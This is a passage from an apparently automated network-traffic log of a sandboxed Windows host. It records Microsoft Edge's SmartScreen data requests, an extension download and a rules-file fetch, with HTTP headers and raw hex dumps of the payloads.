                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210228Z-r197bdfb6b46kdskt78qagqq1c00000005q000000000eg2g
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                53192.168.2.5498264.152.133.84436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC723OUTPOST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Content-Length: 746
                                                                                                                                                                                                                                                                                                                                Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                                                                                                                                Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiTnRmWFQ0UFJxb1o1dkYwYUlTbm9YQT09IiwgImhhc2giOiJTR2w2VUcyT3hmOD0ifQ==
                                                                                                                                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                If-None-Match: "636976985063396749.rel.v2"
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC746OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                                                                                                                                Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                Content-Length: 57
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Kestrel
                                                                                                                                                                                                                                                                                                                                ETag: "638343870221005468"
                                                                                                                                                                                                                                                                                                                                Request-Context: appId=cid-v1:7b18f7b7-44a8-4212-9aac-12b29c628ff9
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:28 UTC57INData Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d
                                                                                                                                                                                                                                                                                                                                Data Ascii: 9murmur3,MhZ8\<&LiH[?m


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                54192.168.2.549827152.195.19.974436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC624OUTGET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1730754144&P2=404&P3=2&P4=Xb6YD%2fVIbLoI02xXDPh%2bW27OxURFasr%2b5RGQKb8nZSp%2fdwjD7a%2bdYtg49cx%2fkIIFHrn1TLszaZhgIIgg1mMaCw%3d%3d HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                MS-CV: K/+yqsaimD9BKDXR6eceal
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC633INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Age: 10075880
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=17280000
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:29 GMT
                                                                                                                                                                                                                                                                                                                                Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                                                                                                                                                                                                                                                                                                                Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                                                                MS-CorrelationId: 5880bbaa-f139-48dd-942e-a0adb04a9f4c
                                                                                                                                                                                                                                                                                                                                MS-CV: Grb0Lx3ldaAxoNaTt1rCGY.0
                                                                                                                                                                                                                                                                                                                                MS-RequestId: 803a6f2d-d0c7-4dfc-9472-668c4d649ec3
                                                                                                                                                                                                                                                                                                                                Server: ECAcc (dac/9C9C)
                                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.3
                                                                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                X-CCC: US
                                                                                                                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                X-Powered-By: ARR/3.0
                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                Content-Length: 11185
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC11185INData Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                55192.168.2.5498284.152.133.84436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC734OUTPOST /api/browser/edge/data/toptraffic/3 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Content-Length: 746
                                                                                                                                                                                                                                                                                                                                Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                                                                                                                                Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiTnRmWFQ0UFJxb1o1dkYwYUlTbm9YQT09IiwgImhhc2giOiJTR2w2VUcyT3hmOD0ifQ==
                                                                                                                                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                If-None-Match: "170540185939602997400506234197983529371"
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC746OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                                                                                                                                Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC252INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                Content-Length: 460992
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Kestrel
                                                                                                                                                                                                                                                                                                                                ETag: "638004170464094982"
                                                                                                                                                                                                                                                                                                                                Request-Context: appId=cid-v1:7b18f7b7-44a8-4212-9aac-12b29c628ff9
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16132INData Raw: 00 01 b7 32 6c 49 bd 35 18 3c 43 00 3b d3 7b 9a 00 08 16 f5 5f 2b 6a 45 e7 a6 60 9a c2 7d 9c 16 00 0c 2d 9e cc 04 23 e9 41 f4 82 16 a9 4b 52 db 00 0c 6c e3 4d 30 2c 73 87 bc fb 29 94 39 d4 c2 00 0c b4 d9 e2 eb e5 8f d8 b5 78 ca fa c6 82 9e 00 0c da 46 f1 62 1d cd 1e ab c5 cd 6a 55 ed dc 00 0e 79 d2 8a 68 27 a0 d5 e5 e5 89 bf 4c 3c 1f 00 12 2a 1f c4 5a 99 f8 2a 25 e9 2a 92 1a f6 5f 00 14 b2 67 12 34 79 75 12 bc d6 99 a8 99 1c cc 00 14 c8 bf 10 27 63 3d b9 cd 49 30 99 bf d3 a1 00 17 f8 9d 81 a3 94 71 57 f8 bf 3c 3a 4e ba d2 00 1a 3c bc a6 55 f9 2c 4d 69 94 e9 c9 5f b9 8c 00 1f 17 b3 27 28 0e f5 55 df 39 10 21 05 ce 96 00 1f bc ff bf d8 75 92 d1 13 89 37 0b 86 dc 34 00 20 98 bc 45 61 f8 b8 0d 34 2e 2b fb 37 39 6b 00 21 54 ca 2d 35 57 fb 9f 21 b8 d7 9a 40 2b
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2lI5<C;{_+jE`}-#AKRlM0,s)9xFbjUyh'L<*Z*%*_g4yu'c=I0qW<:N<U,Mi_'(U9!u74 Ea4.+79k!T-5W!@+
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16384INData Raw: b8 6c 65 b5 81 d7 e8 96 a2 f6 fb f5 08 e9 4a 27 41 5a ef 9e 20 88 b1 dd 92 43 f1 c7 08 f6 31 2a b4 6b b0 d0 7b af f2 6e c0 3b 30 49 08 f7 14 46 2e c2 8e a1 9b 56 f6 89 ff 89 a1 a1 08 f8 86 49 94 74 f7 df c7 92 d3 f1 d5 09 db a4 08 f9 bb 85 2c 48 b7 6a b2 fe 9c 06 4c 91 ba af 08 fb 12 e5 67 95 f2 51 95 31 42 c4 14 92 6c 77 08 fb aa 20 c5 0c 96 4a 9a 6f 2e 40 d4 2b fd 90 08 fe aa 92 f9 b3 b3 8f b8 65 27 9b b9 df 14 f7 09 00 34 db 44 0d dd 66 70 53 8f 0b 31 18 8b ba 09 05 38 28 fa 80 5f eb 56 83 46 d1 dd 83 34 b7 09 06 35 0d 42 c1 3f 91 ee 97 ed f4 31 68 37 32 09 08 35 c9 14 24 10 2f b5 80 ac f7 9a 16 e6 e2 09 08 7a 82 38 a3 08 0b 00 2c 62 9c d0 2e d2 c4 09 09 d1 da a7 a8 16 cd 89 e5 ac fe b9 cc 8e 69 09 0e 20 d3 38 58 e2 6b 84 a1 e7 75 97 ad 75 61 09 0e 4d
                                                                                                                                                                                                                                                                                                                                Data Ascii: leJ'AZ C1*k{n;0IF.VIt,HjLgQ1Blw Jo.@+e'4DfpS18(_VF45B?1h725$/z8,b.i 8XkuuaM
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC16384INData Raw: 88 ca 0d 74 ff b7 03 d5 0b 17 29 2e 12 86 39 8d 65 51 d1 6b 43 f6 37 a6 5e 4e 7e d5 12 8c a6 4c a1 b4 9a f4 6b 69 49 eb 0d 33 90 eb 12 8f 60 36 ec 98 cd 7f 6a 59 fe c5 d1 d5 4b 38 12 92 da 96 3e 8a fd ee fb c5 ac d0 29 b4 8e 13 12 95 25 87 d8 33 f2 c0 16 e8 0f 63 67 d6 78 d1 12 96 03 01 99 d8 95 ea 2c 0a f8 85 62 05 db 93 12 96 52 aa 59 60 de e6 e9 8c 23 d4 b7 c1 34 3d 12 96 bf ae d0 b9 c2 92 db f1 41 07 61 b1 82 5d 12 97 53 89 b5 7c fd 88 82 19 c7 b1 b0 0f af ed 12 98 30 32 6a a5 03 4e 26 db 95 be 1b a9 a3 e2 12 9a ea fe 35 92 c8 f4 3b 7a 18 36 80 cb 78 bf 12 9b 33 a3 9e d9 7b 54 c8 7b da 3b ed a8 dd 25 12 9b 98 d3 83 cc 49 8e 52 58 13 7e 3f 04 d9 af 12 9c 0d 11 dc 93 65 32 c4 f0 f6 a9 12 25 13 25 12 9c 28 31 10 8a f9 38 40 df 1f 08 9f 08 d4 71 12 9f 71
                                                                                                                                                                                                                                                                                                                                Data Ascii: t).9eQkC7^N~LkiI3`6jYK8>)%3cgx,bRY`#4=Aa]S|02jN&5;z6x3{T{;%IRX~?e2%%(18@qq
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC16384INData Raw: 8c e6 1b 88 d1 53 7d a1 f2 bc f6 d3 1b bd 38 be aa 88 bb f2 1c 05 de ac 2c b3 63 c3 1b bf d8 bc e5 a8 4c 42 a1 5e 7d 76 56 07 18 dd 1b c1 05 6e 7a a0 f3 27 8e eb 4f 29 e6 e0 a0 2a 1b c2 a1 45 60 4f 19 d0 fa 94 66 c2 31 56 e0 ac 1b c3 58 61 04 7c 91 76 1b 27 0c 2e 05 4d 26 17 1b c4 0f 81 e0 48 ff 13 e9 e7 fd ae 77 76 47 85 1b c5 d5 9a 68 ef 46 53 52 de 8b 1c 3a 7b 4f 53 1b cc c2 c4 df 4d dc 18 9f 1a a6 aa 47 f5 9f 2e 1b cd 8c 32 11 55 08 6c 9c 2f 0b 09 34 58 ca d2 1b cf 2c 48 15 0b dd b9 a9 cc 90 e8 14 76 e1 c7 1b d1 50 e1 1f 03 b2 ff 0f ab b3 c3 a2 cf c2 1a 1b d6 7a 97 41 b9 a0 2a 37 7b ba 9a 0a 00 47 56 1b da a2 08 31 23 96 3c 24 0a b0 10 2f 5e b6 c3 1b dc 15 6b ce f9 b8 64 db f8 fb 84 2a d6 02 9b 1b dc 58 1e e3 44 3f fb c2 e7 7f 97 d4 41 5f 1c 1b dc 83
                                                                                                                                                                                                                                                                                                                                Data Ascii: S}8,cLB^}vVnz'O)*E`Of1VXa|v'.M&HwvGhFSR:{OSMG.2Ul/4X,HvPzA*7{GV1#<$/^kd*XD?A_
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC16384INData Raw: 9c f0 8f 05 68 32 cf 23 af 0f e9 31 25 17 e2 83 8c a0 e0 45 41 22 69 ae 51 16 97 9e 25 19 94 88 65 65 22 da 5c e4 68 67 07 cf 5f 7a 25 1e 6a 2e 6e bf 40 39 a7 91 dd 9f 82 5c b4 be 25 21 01 14 90 ab fe fa c5 d4 0a 62 0b cd 30 e1 25 21 03 7a 48 db 3d 1f b8 bc 66 91 12 c8 41 7f 25 24 00 6f 09 69 7b 22 bc d0 5a 82 9d c8 cb 00 25 24 76 95 60 1f 20 bf 51 8e ef 43 af 74 27 17 25 24 d0 90 ec 4d 35 f3 3b 75 d1 b6 56 62 63 3e 25 25 bd 14 86 f0 f0 dc 12 c9 55 32 f1 85 66 4f 25 25 de ea a2 0c 7b b9 31 02 c3 fc 10 0f 92 23 25 27 0a 2e 12 37 63 79 36 e7 03 6f 4c 1e 67 7e 25 29 ef 20 dd 60 cb e0 1f 91 82 96 c4 38 ef d3 25 2c 0d 19 1e 65 a3 27 9b 58 e2 44 e3 80 93 37 25 2c e2 18 e3 78 51 0e b2 f9 62 26 e5 78 8f 9f 25 36 84 bd bb 8f cc a6 bc 42 a8 bf 22 b0 f1 a9 25 3a 54
                                                                                                                                                                                                                                                                                                                                Data Ascii: h2#1%EA"iQ%ee"\hg_z%j.n@9\%!b0%!zH=fA%$oi{"Z%$v` QCt'%$M5;uVbc>%%U2fO%%{1#%'.7cy6oLg~%) `8%,e'XD7%,xQb&x%6B"%:T
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC16384INData Raw: b6 07 8f 44 9d 29 36 4f 29 8a 7d 80 2e 1d 98 b7 c7 17 54 cd a1 2b c2 e9 29 21 98 f9 2e 1f 4a 0d ee 13 3f 5a 00 ff e7 0d f0 d4 1c 86 2e 21 27 d4 ff 4a 83 22 1e 86 3f 93 6b 62 a1 0e 2e 25 e1 37 a1 70 d4 f6 b3 17 bd e9 dd 8d 2a 44 2e 26 32 0d f4 82 4c f6 14 9e 97 92 23 fa 52 37 2e 2a 40 96 f4 4d 34 89 21 f2 49 39 e8 d3 d3 19 2e 2b ef 39 f1 8a 4a 7e 28 b9 d0 be 00 6f 35 68 2e 2e 95 d3 bd e3 e7 a0 d6 d0 25 5e 0d b7 b5 a5 2e 31 ce 53 a9 54 e0 3b 3c 2f fc 4d eb 0f a5 e1 2e 33 1e 46 e8 3a 01 30 91 17 49 f3 33 11 46 79 2e 36 b7 bb 07 e4 6d 92 d5 42 49 d7 e5 49 f4 85 2e 36 e8 96 57 36 97 bb 40 7a 3b ca 8a e0 7e 53 2e 3a 1e f2 97 75 d6 ae 4f f5 85 eb 36 38 65 e5 2e 3a 59 df c9 6e 75 92 ac 40 ac 59 a6 fd e4 1c 2e 3b 8e 5c 94 1d 75 39 54 06 13 6b 6e 7f ef 30 2e 43 e8
                                                                                                                                                                                                                                                                                                                                Data Ascii: D)6O)}.T+)!.J?Z.!'J"?kb.%7p*D.&2L#R7.*@M4!I9.+9J~(o5h..%^.1ST;</M.3F:0I3Fy.6mBII.6W6@z;~S.:uO68e.:Ynu@Y.;\u9Tkn0.C
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC16384INData Raw: 02 f3 ca e4 05 cb a0 be 15 69 62 32 37 3c 37 3b db 81 8a b2 df cf ef b1 79 3f f8 ae 37 3d a3 01 e8 95 76 a1 63 78 77 2e 93 42 3d 4f 37 3e c4 08 a5 37 4f 84 43 dc 19 00 a9 8f 2e 0d 37 3f 82 55 cb cd 06 b9 0c 0d 94 f9 4f d6 82 e8 37 44 09 28 b8 33 ef b7 ee 6b 4c 90 ee e0 d1 3a 37 44 83 9a 56 2d 6a 58 ea 6b e5 8f 6a 1d 17 23 37 47 0f 55 f8 2b 1c 30 89 3a 1d e2 21 89 b7 42 37 4b 86 38 d0 cd 9f 96 62 d8 da bf d5 15 ed cb 37 4e 81 34 2b 0e ea ab 6f ae 29 15 59 32 ae 46 37 50 d2 0c 2a e2 ca 59 ec 21 86 70 f9 7a 6c d1 37 55 32 b2 91 f0 e7 b8 47 d0 f7 0f 64 90 d9 51 37 56 ce 44 24 61 58 d7 f8 d4 0d 8b fe 3d b0 27 37 58 1f 24 d2 a5 24 9c d7 5c 5a 71 f9 e9 f2 a3 37 58 9d d0 f0 06 3a 05 be 08 d9 90 bc 18 0d 71 37 5d 04 71 81 05 8e b6 9b 24 f2 54 35 1b 18 46 37 62 eb
                                                                                                                                                                                                                                                                                                                                Data Ascii: ib27<7;y?7=vcxw.B=O7>7OC.7?UO7D(3kL:7DV-jXkj#7GU+0:!B7K8b7N4+o)Y2F7P*Y!pzl7U2GdQ7VD$aX='7X$$\Zq7X:q7]q$T5F7b
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC16384INData Raw: 30 9b b9 2f 98 88 40 3b cc 98 d2 59 40 6d c4 d7 67 2a f1 8a f6 d5 d3 92 a9 c6 13 1d 40 71 5f 29 26 14 e2 86 f2 b1 3c d6 fc 07 07 4a 40 77 d4 86 06 be 80 6f b2 fd e4 19 fe 6b 6a 94 40 78 4d f5 b9 67 58 78 83 29 63 04 29 22 98 8d 40 7a 85 3f 10 18 78 19 d3 be 45 8d 0e 49 7b bb 40 7b 5d c5 55 97 e5 9d 35 9d 27 93 51 1d be 21 40 7d 42 88 f1 ca 9d ba 2a 28 3a f8 72 71 ba c7 40 7e 4d cf f4 13 b8 8f f1 9c e6 e4 a8 50 74 d0 40 80 bb 51 db 04 52 b7 b2 f3 5f dc db 6d 4b de 40 88 e2 91 a0 6c 67 8c d2 0b 9f d2 91 ca 6d 22 40 8a b9 d3 6a f9 07 64 05 ea 52 dc 44 82 0b 38 40 8b 54 ce 67 df 8c a3 48 2d 96 f6 ed e4 cf 78 40 8e 78 fd f9 d7 db ac 12 a0 80 27 db 9f 14 42 40 90 00 78 66 ff 66 2b 58 9f 18 13 aa 3d 6e b3 40 90 fa a1 0b 8e ee 2b 73 4b 59 c6 c9 b1 84 9b 40 93 53
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0/@;Y@mg*@q_)&<J@wokj@xMgXx)c)"@z?xEI{@{]U5'Q!@}B*(:rq@~MPt@QR_mK@lgm"@jdRD8@TgH-x@x'B@xff+X=n@+sKY@S
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:30 UTC16384INData Raw: 66 82 7d 26 60 5e 84 ec 72 2a af 39 49 bb 12 c2 0a 6a 68 a1 f1 aa 3c 93 f9 79 13 0e 49 bb 81 dd 8c 7e 5d 19 6b 54 60 33 c1 1e 70 56 49 bc df 84 ed 14 a3 5d 07 06 25 84 6a 95 02 e0 49 bd eb 48 24 83 1e f1 e0 29 fe 9e e6 22 da 07 49 c1 2d 65 e8 79 f6 32 c8 9b 5b 3f 1a a8 9d b9 49 c4 33 af 97 7a e9 a1 ba ed 12 d0 a3 40 1e 42 49 c5 09 f1 9f 2c bb 61 75 14 cf 80 9c 0e 85 9e 49 c8 81 16 cb ae 60 54 25 eb 75 fe e4 b5 16 8c 49 cc 62 7c 10 80 46 f7 71 86 18 7b bd ea 45 5f 49 cd ad e9 e7 ee e9 a2 7e 24 2e 10 93 70 b0 ad 49 d1 bc ac 01 05 b1 9b be b4 f8 4e e6 0c 0d ac 49 d2 4b be 25 0a bd 70 d0 f7 10 c2 d7 38 8b f2 49 d4 c5 71 4c 7f 7a 2a 83 c3 c3 50 d2 c2 4c 3e 49 d5 40 eb ee b7 40 f4 16 fe b4 e7 35 d0 25 e3 49 d6 e7 89 68 04 ba a1 f5 37 3f 51 0a 5e cc 25 49 da b4
                                                                                                                                                                                                                                                                                                                                Data Ascii: f}&`^r*9Ijh<yI~]kT`3pVI]%jIH$)"I-ey2[?I3z@BI,auI`T%uIb|Fq{E_I~$.pINIK%p8IqLz*PL>I@@5%Ih7?Q^%I


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                56192.168.2.54982913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:29 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
